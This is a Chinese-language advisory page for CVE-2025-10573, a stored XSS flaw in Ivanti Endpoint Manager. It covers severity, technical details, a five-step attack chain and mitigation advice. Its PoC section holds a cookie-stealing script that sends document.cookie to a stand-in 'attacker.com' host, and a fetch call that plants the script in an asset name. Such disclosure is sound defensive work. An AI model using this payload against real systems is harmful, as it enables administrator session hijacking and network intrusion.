CVE-2025-10573 CVSS 9.6 严重

CVE-2025-10573 Ivanti Endpoint Manager 存储型XSS漏洞

披露日期: 2025-12-09

来源: 3c1d8aa1-5a33-4ea4-8992-aadd6440af75

漏洞信息

漏洞编号

CVE-2025-10573

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

9.6 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Ivanti Endpoint Manager

漏洞概述

CVE-2025-10573是Ivanti Endpoint Manager（EPM）中存在的严重安全漏洞，CVSS评分高达9.6。该漏洞为存储型跨站脚本（Stored XSS）漏洞，存在于2024 SU4 SR1之前的版本中。攻击者可利用此漏洞通过构造恶意脚本内容，当管理员访问受污染的数据时，在管理员的浏览器会话中执行任意JavaScript代码。由于该漏洞影响企业端点管理系统的管理界面，攻击成功可能导致管理员账户被劫持、敏感数据泄露、甚至进一步横向移动到其他企业系统。漏洞利用无需认证即可植入恶意代码，但需要管理员交互（访问特定页面）才能触发执行。

技术细节

该存储型XSS漏洞源于Ivanti Endpoint Manager对用户输入内容缺乏充分的输入验证和输出编码。攻击者可以在EPM的某个数据输入字段（如资产名称、用户描述、自定义字段等）中注入恶意JavaScript代码。由于应用在存储数据时未进行安全过滤，该恶意脚本被永久存储在数据库中。当管理员通过Web管理控制台浏览相关资产列表或详情页面时，应用程序从数据库读取并展示这些未经过滤的数据，导致恶意JavaScript在管理员浏览器上下文中执行。攻击者可利用此漏洞窃取管理员会话Cookie、模拟管理员操作、修改系统配置或部署恶意软件到受管端点。

攻击链分析

STEP 1

步骤1: 侦察和信息收集

攻击者识别目标Ivanti Endpoint Manager版本，确认其版本低于2024 SU4 SR1，并定位可利用的输入点（如资产名称、自定义字段等）

STEP 2

步骤2: 恶意载荷注入

攻击者通过API或Web表单向易受攻击的字段注入包含恶意JavaScript的载荷，该载荷被存储在数据库中

STEP 3

步骤3: 社会工程/等待管理员访问

攻击者等待或诱使管理员访问包含恶意脚本的页面（如资产列表、详情页等）

STEP 4

步骤4: XSS执行与会话劫持

管理员访问页面时，恶意JavaScript在管理员浏览器上下文中执行，可窃取会话Cookie或执行管理员操作

STEP 5

步骤5: 持久化控制与横向移动

攻击者利用获取的管理员权限修改系统配置、部署恶意软件到端点或进一步渗透企业网络

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-10573 Stored XSS PoC for Ivanti Endpoint Manager -->
<!-- This PoC demonstrates the stored XSS vulnerability in EPM -->

<script>
// PoC: Stored XSS in Ivanti Endpoint Manager
// Target: EPM versions prior to 2024 SU4 SR1

// Step 1: Inject malicious JavaScript via vulnerable input field
const maliciousPayload = '<script>document.location="https://attacker.com/steal?c='+document.cookie+'"</script>';

// Step 2: Send the payload to the vulnerable endpoint
fetch('/api/assets', {
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
    // Attackers can inject without authentication in some cases
  },
  body: JSON.stringify({
    name: maliciousPayload,
    description: 'Asset with injected XSS',
    type: 'computer'
  })
});

// Step 3: When admin views the asset, cookie is stolen
// The injected script will execute in admin's browser context
console.log('[PoC] XSS payload injected successfully');
</script>

影响范围

Ivanti Endpoint Manager < 2024 SU4 SR1

防御指南

临时缓解措施

立即将Ivanti Endpoint Manager升级到2024 SU4 SR1或最新版本。在无法立即升级的情况下，可通过限制管理控制台的访问范围、监控异常的管理员活动、启用额外的会话安全措施（如短会话超时、双因素认证）来降低风险。同时建议审查应用日志，排查是否存在异常的输入提交行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表